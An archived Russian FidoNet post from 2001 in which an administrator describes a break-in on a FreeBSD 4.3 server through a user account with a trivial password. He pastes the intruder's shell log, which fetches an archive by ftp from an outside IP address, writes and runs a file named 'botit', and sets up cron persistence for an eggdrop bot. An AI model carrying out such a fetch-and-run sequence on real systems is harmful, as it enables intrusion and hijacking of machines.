Frozen Fido : RU.UNIX.BSD : BSD HACK (было: Re: За что не любят cdp?)

ru.unix.bsd

 
 - RU.UNIX.BSD ------------------------------------------------------------------
 From : Igor Monakhov                        2:5000/104.54  10 Oct 2001  23:20:06
 To : Dmitry Valdov
 Subject : BSD HACK (было: Re: За что не любят cdp?)
 --------------------------------------------------------------------------------

 Hello Dmitry.

 10 Oct 01 16:39, you wrote to Victor Sudakov:

  DV> From: Dmitry Valdov <dv@dv.ru>

  DV> Victor Sudakov <sudakov@sibptus.tomsk.ru> wrote:

  >> А если отключать все протоколы, в которых возможны дыры... Одному
  >> нашему клиенту недавно проломили непатченную FreeBSD 4.2 и устроили
  >> в нашей клиентской сетке чудненький DoS посредством манипуляций с
  >> ARP. И что теперь?

  DV> Цеплять ethernet клиентов _только_ через VLAN. Каждого через свой.
  DV> По-моему, это очевидно.

   А не дороговато получается по железу? Это надо на каждого клиента умный свич
 вешать...
   У нас правда тоже недавно BSD (4.3) сломали, но тут сами юзеры виноваты
 login=passwd - надо-ж было додуматься :)

 P.S. Вот что взломщик делал на сервере:

 === Cut ===
 id
 cd /home/user
 ls -al
 ftp 158.227.113.62
 tar -zxvf fbsd.tar.gz
 rm -rf fbsd.tar.gz
 cd .n2o
 ls -al
 cat botit

 cat > botit

 chmod +x botit
 ./botit
 crontab -l
 ls -al
 rm -rf botit
 exit
 === Cut ===
   После него осталась запись в кроне и процесс по имени eggdrop. Все данные от
 этого eggdrop шифрованы - разбираться не хотелось, просто вырубил, заткнул дырку
 и успокоился. Вот такие-то дела.

 Igor

 --- GoldED+/LNX 1.1.4.7
  * Origin:  ----> Только что настроеный GoldED и его Origin <-- (2:5000/104.54)

Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор

Тема:	Автор:	Дата:
BSD HACK (было: Re: За что не любят cdp?)	Igor Monakhov	10 Oct 2001 23:20:06
test	Dmitry Savchuk	10 Oct 2001 22:54:02
test2	Dmitry Savchuk	11 Oct 2001 13:27:16

Архивное /ru.unix.bsd/38843bc47573.html, оценка 1 из 5, голосов 10